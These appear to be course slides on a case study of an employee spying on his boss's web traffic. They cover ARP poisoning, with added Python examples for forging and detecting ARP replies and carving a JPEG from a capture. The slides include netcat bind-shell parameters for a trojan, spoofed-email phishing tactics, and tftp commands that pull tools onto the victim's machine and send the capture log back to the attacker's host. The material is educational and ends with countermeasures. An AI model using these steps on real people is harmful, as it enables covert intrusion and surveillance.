TEL 283 What’s the Boss viewing?
Policy • The Boss established a new policy against surfing the web during work hours • Phoenix decides to examine the sites that the Boss is looking at by spying on him
Setup • The networked machines are connected via a switch • Private 192.168.1.0 network • Boss’ IP: 192.168.1.5 • Phoenix’s IP: 192.168.1.6
The Plan • Monitor traffic to and from the Boss’ machine • How “loud” should this approach be? • Loud/noisy means the approach could trigger IDS/IPS alarms • There can be reasons to launch a noisy attack • Provides a distraction from another attack • Sometimes it’s the only way to monitor the traffic • Since only a single host’s traffic is the target, ARP poisoning, MAC spoofing and MAC flooding will not be used
Viewing Switched Network Traffic • “Loud” methods • Gratuitous ARP for individual hosts • ARP poisoning • MAC spoofing • MAC flooding • SPAN / port mirroring (a legitimate switch feature that copies one port’s traffic to a monitor port; it requires administrative access to the switch rather than an attack)
Viewing Switched Network Traffic • Gratuitous ARP • An unsolicited ARP reply • The protocol allows it: a host accepts a reply without ever having sent a request (ARP is stateless!) • The reply associates the target’s IP (typically the gateway’s) with the collector’s MAC address, so the victim sends its outbound traffic to the collector • Spoof the MAC of the gateway • The collector answers ARP requests for the gateway’s MAC with its own • If the collector also sends with the gateway’s MAC as its source, the switch sees that MAC on two ports and its forwarding table flaps between them, so outbound frames for the gateway are alternately delivered to the collector’s port • MAC flooding • Overwhelm the switch’s MAC (CAM) table with bogus source addresses • Once the table is full the switch floods frames for unknown destinations out every port, effectively “failing over” into hub mode • macof, part of dsniff (http://monkey.org/~dugsong/dsniff/)
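As an added example (not part of the slides), here is the frame the gratuitous-ARP trick sends and the check a monitoring host would run to catch it. Everything is built in memory so it runs offline; the gateway address 192.168.1.1 and all MAC addresses are assumptions, since the slides only give the Boss’ and Phoenix’s IPs.

```python
"""ARP poisoning via gratuitous ARP: forge the reply, then detect the mapping change.

Added example, not from the slides. All frames are built in memory, so this runs
offline. The gateway IP 192.168.1.1 and every MAC address below are assumptions;
the slides give only 192.168.1.5 (Boss) and 192.168.1.6 (Phoenix).
"""
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP "is-at" reply (14 + 28 bytes).

    Sent unsolicited with sender_ip = the gateway's IP and sender_mac = the
    collector's MAC, this is the gratuitous-ARP trick from the slide: the
    victim caches the bogus mapping without ever having asked for it.
    """
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # hardware type Ethernet, protocol IPv4, hlen 6, plen 4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip), or None if this is not an ARP frame."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    opcode = struct.unpack("!H", frame[20:22])[0]
    return opcode, mac_str(frame[22:28]), ip_str(frame[28:32])


def detect_arp_poisoning(frames, trusted):
    """Flag ARP replies whose sender IP is a trusted address but whose sender MAC
    is not the trusted one. Plain ARP never performs this check (it is stateless);
    this is what arpwatch-style monitors and Dynamic ARP Inspection add.
    Returns a list of (frame_index, ip, expected_mac, seen_mac)."""
    alerts = []
    for idx, frame in enumerate(frames):
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        opcode, seen_mac, ip = parsed
        expected = trusted.get(ip)
        if opcode == ARP_REPLY and expected is not None and seen_mac != expected:
            alerts.append((idx, ip, expected, seen_mac))
    return alerts


# Constructed sample: the addresses are assumptions, not from the slides.
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "00:11:22:33:44:01"
BOSS_IP, BOSS_MAC = "192.168.1.5", "00:11:22:33:44:05"
PHOENIX_IP, PHOENIX_MAC = "192.168.1.6", "00:11:22:33:44:06"

TRUSTED = {GATEWAY_IP: GATEWAY_MAC, BOSS_IP: BOSS_MAC, PHOENIX_IP: PHOENIX_MAC}

SAMPLE_FRAMES = [
    # legitimate reply: the real gateway answering the Boss
    build_arp_reply(GATEWAY_MAC, GATEWAY_IP, BOSS_MAC, BOSS_IP),
    # gratuitous reply from Phoenix claiming the gateway's IP with his own MAC
    build_arp_reply(PHOENIX_MAC, GATEWAY_IP, BOSS_MAC, BOSS_IP),
    # an IPv4 frame (ethertype 0x0800), ignored by the detector
    mac_bytes(BOSS_MAC) + mac_bytes(GATEWAY_MAC) + b"\x08\x00" + b"\x45" + b"\x00" * 27,
]


def run_demo():
    return detect_arp_poisoning(SAMPLE_FRAMES, TRUSTED)


if __name__ == "__main__":
    for idx, ip, expected, seen in run_demo():
        print(f"frame {idx}: {ip} claimed by {seen}, expected {expected}")
```

The detector only fires on the second frame: the sender IP is the gateway’s, but the sender MAC is Phoenix’s. A trusted table populated from DHCP leases or a static inventory is what makes this usable on a real segment.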
Quieter method • Capture the traffic on the target host itself • Plant WinPCap and Trojan Horse on the host • The trick will be to install the software on the target host • Boss will not blindly install software • Have to convince him it’s something of value to him • The plan consists of a chained series of exploits
The Plan • Copy a web site and host it on Phoenix’s server • Bind Netcat to a legitimate executable file • Send email to boss • Download the free executable • Netcat will also be downloaded and installed • Connect to boss’ machine using Netcat • Use TFTP and download a WinDump program onto boss’ machine • Capture the boss’ network traffic • Analyze captured traffic • Rebuild a jpg image using a hex editor
Phishing Scam • Phoenix locates a site and plans to get his boss to visit a copied version of it • Lays the groundwork via some social engineering • Tells the boss about a site, “certificatepractice.com”, which offers a free CCNA practice exam as a promotional offer • Uses a utility to download and mirror the site • Wget (www.gnu.org/software/wget) • Copies the site recursively to disk, following the links from the first page to an appropriate depth • This also copies the practice test executable • Phoenix will bind his Trojan to this executable
Binding the Trojan • A Trojan wrapper (binder) program is used • YAB (Yet Another Binder) • Areyoufearless.com (no longer there, however it can be obtained via BitTorrent sites) • Altavista.net • Packetstormsecurity.org • Add Bind File option • Allows Phoenix to bind nc.exe to the practice test executable • Will execute nc (asynchronously if possible) • Execution parameters can be added for when nc starts up • -p 50 -e cmd.exe -L (listen on TCP port 50, hand the connection to cmd.exe; -L on the Windows build keeps listening after the client disconnects) • Registry startup option available (default is no) • Melt stub option • Deletes the bound file after it has run, leaving only the payload behind • An icon can be added to make the install appear legitimate
Setting up the phishing site • Overwrite the original ccna.exe file on the phony site with the bound Trojan file • Register a very similar domain name • “certification-practice.com” • Send an email to the victim • Phoenix uses an anonymous e-mailer and spoofs the email header so that the “From:” address appears to be the real site • www.mail.com • Doesn’t require a “real” email address to register • The victim would have to read the email message headers in order to see the real source domain
Email • Check for spelling and grammatical errors • Offer something free or on a trial basis • Appeal to greed • Explain why the victim is getting something for nothing, to lower suspicion • Appeal to the victim’s sense of self • Self-help tools, adding to success, etc. • Brevity • The text of the email contains the link to the site • It appears as the URL of the real site, but the hyperlink actually points to the phony site • Present the email to the victim • Possibly prepare the victim for the email, adding to the enticement
Obtain the victim’s IP address • Angry IP Scanner • www.angryziber.com/ipscan/ • Scan the IPs on the network for the host with port 50 open and listening
Connect to the victim machine • nc to the victim’s machine on port 50 • Verify the connection using ipconfig • Will show the victim machine’s IP in the nc window
Install packet capture software • Use a command line utility • nc does not allow use of a GUI (Windows) interface • Phoenix sets up a TFTP server on his machine • Sysinternals has a TFTP server available • Free • No configuration required • Windows already has a TFTP client! • WinDump is downloaded from www.winpcap.org/windump and placed into the default TFTP server directory (TFTP-Root) • Using Netcat, Phoenix types tftp -i 192.168.1.6 get windump.exe windump.exe • Syntax: tftp [-i] host [put | get] source destination • The -i switch selects binary (image) transfer, which is required for executables
Run WinDump • Options • -c count (number of packets to capture) • -s snaplen (bytes captured per packet; 1500 captures full Ethernet frames) • -w filename (write the captured packets to this file) • windump -c 500 -s 1500 -w capture.log • WinDump requires WinPcap • If the victim does not have WinPcap installed, Phoenix must transfer and manually install WinPcap on the victim machine
Installing WinPcap • Phoenix downloads WinPcap and unzips it • Transfers the files via TFTP to the victim’s WinPcap directory • daemon_mgm.exe • NetMonInstaller.exe • npf_mgm.exe • rpcapd.exe • Uninstall.exe • Executes, in order: • npf_mgm.exe -r • daemon_mgm.exe -r • NetMonInstaller.exe i
Analyzing the capture log • Using Netcat, send the file back to Phoenix’s TFTP server: tftp -i 192.168.1.6 put capture.log • Use a packet analyzer to view the traffic • Wireshark • A review shows the sites visited by the victim • Includes an HTTP GET for a file called “gambling.jpg” • Follow TCP stream • Save the output as raw data • Use a hex editor (WinHex), if required, to edit the raw data • Remove everything before the actual binary file (HTTP headers, etc.) • This leaves just the binary of the image • A JPEG starts with ÿØÿà (bytes FF D8 FF E0 for a JFIF file; an Exif file starts FF D8 FF E1, so match on FF D8 FF) and ends with FF D9
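The hex-editor step above can be automated. The following is an added Python example, not code from the slides: it takes a raw stream as saved by Wireshark’s Follow TCP Stream, strips the HTTP headers, and carves the JPEG by walking its marker segments rather than searching for the first FF D9 (an Exif APP1 segment can embed a thumbnail with its own SOI/EOI, and a naive search would truncate the file there). The stream, hostname and image bytes are constructed for the demo; the image is structurally valid JPEG but not a real picture.

```python
"""Carve a JPEG out of a raw HTTP response saved from Wireshark's Follow TCP Stream.

Added example, not from the slides. The stream below is constructed in memory
(hostname and image bytes are made up); the image has valid JPEG marker
structure but is not a real picture.
"""
import re

SOI = b"\xff\xd8"   # start of image
EOI = b"\xff\xd9"   # end of image


def split_http_body(stream):
    """Body of the first HTTP response in a raw two-way stream.

    Honors Content-Length and refuses compressed or chunked bodies, which must
    be decoded before carving (Wireshark's Export Objects does that for you).
    """
    m = re.search(rb"HTTP/1\.[01] \d{3} ", stream)   # status line, not the request line
    if m is None:
        raise ValueError("no HTTP response in stream")
    hdr_end = stream.find(b"\r\n\r\n", m.start())
    if hdr_end < 0:
        raise ValueError("truncated response headers")
    body = stream[hdr_end + 4:]
    for line in stream[m.start():hdr_end].decode("latin-1").split("\r\n")[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip().lower()
        if name == "content-length":
            body = body[:int(value)]
        elif name in ("content-encoding", "transfer-encoding") and value != "identity":
            raise ValueError(f"{name}: {value} must be undone before carving")
    return body


def jpeg_length(buf, start):
    """Length of the JPEG at buf[start] (SOI through EOI), or None if malformed or
    truncated. Segment lengths are honored, so an embedded thumbnail's FF D9 is
    skipped instead of being mistaken for the end of the outer image."""
    if buf[start:start + 2] != SOI:
        return None
    pos = start + 2
    while pos + 2 <= len(buf):
        if buf[pos] != 0xFF:
            return None
        marker = buf[pos + 1]
        if marker == 0xD9:                              # EOI
            return pos + 2 - start
        if marker == 0xFF or 0xD0 <= marker <= 0xD8:    # fill byte / standalone markers
            pos += 1 if marker == 0xFF else 2
            continue
        if pos + 4 > len(buf):
            return None
        pos += 2 + int.from_bytes(buf[pos + 2:pos + 4], "big")   # skip the segment
        if marker == 0xDA:                              # SOS: skip entropy-coded data
            while (i := buf.find(b"\xff", pos)) >= 0 and i + 1 < len(buf):
                if buf[i + 1] == 0x00 or 0xD0 <= buf[i + 1] <= 0xD7:   # stuffed FF / RSTn
                    pos = i + 2
                else:
                    pos = i
                    break
            else:
                return None
    return None


def carve_jpegs(buf):
    """Every complete JPEG in buf. Matches FF D8 FF so that both JFIF (FF D8 FF E0)
    and Exif (FF D8 FF E1) files are found."""
    found, pos = [], 0
    while (i := buf.find(SOI + b"\xff", pos)) >= 0:
        n = jpeg_length(buf, i)
        if n is None:
            pos = i + 2
        else:
            found.append(buf[i:i + n])
            pos = i + n
    return found


def _segment(marker, data):
    """Marker segment: FF xx, 2-byte length (which includes itself), payload."""
    return b"\xff" + bytes([marker]) + (len(data) + 2).to_bytes(2, "big") + data


# Constructed sample data (not a real image, not from the slides).
_SOS_HDR = b"\x01\x01\x00\x00\x3f\x00"
SAMPLE_THUMB = SOI + _segment(0xDA, _SOS_HDR) + b"\x12\x34\xff\x00\x56" + EOI
SAMPLE_IMAGE = (
    SOI
    + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")   # APP0
    + _segment(0xE1, b"Exif\x00\x00" + SAMPLE_THUMB)                    # APP1 with thumbnail
    + _segment(0xDA, _SOS_HDR)
    + b"\xaa\xbb\xff\xd0\xcc\xff\x00\xdd"   # scan data with a restart marker and a stuffed FF
    + EOI
)
SAMPLE_STREAM = (
    b"GET /gambling.jpg HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
    + b"HTTP/1.1 200 OK\r\nContent-Type: image/jpeg\r\nContent-Length: "
    + str(len(SAMPLE_IMAGE)).encode() + b"\r\n\r\n"
    + SAMPLE_IMAGE
    + b"GET /next.html HTTP/1.1\r\n"   # next request on the connection; must not leak into the file
)


def run_demo():
    """Carve every image out of the constructed stream; write them with open(..., 'wb')."""
    return carve_jpegs(split_http_body(SAMPLE_STREAM))
```

On real captures the two things that break this are compression (Content-Encoding: gzip on an image is rare but legal) and chunked transfer; the function refuses both rather than carving garbage. If a capture was taken with a short snaplen the response body will be truncated and jpeg_length returns None, which is the signal to recapture with -s 1500 or 0.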
Finale • Anonymous note left on the victim’s desk highlighting the activity • Internet usage policy relaxed the next day
Countermeasures • Phishing • Training! • Spam filters / phishing filters • Trojan horse • Anti-virus software with the latest signatures • However, some groups will alter a Trojan (for a price) so that it no longer matches a signature • EliteC0ders (no longer offers this “service”) • Software policy (restrict what users may install) • Sniffing • Port security on switches • Protects against MAC spoofing and MAC flooding by limiting the MAC addresses allowed on a port; ARP poisoning, where the attacker uses his own MAC, is addressed by Dynamic ARP Inspection together with DHCP snooping • IPS • PromiScan (detects NICs left in promiscuous mode by a sniffer) • Host-based IDS • Cisco Security Agent • Warns if a new application is launching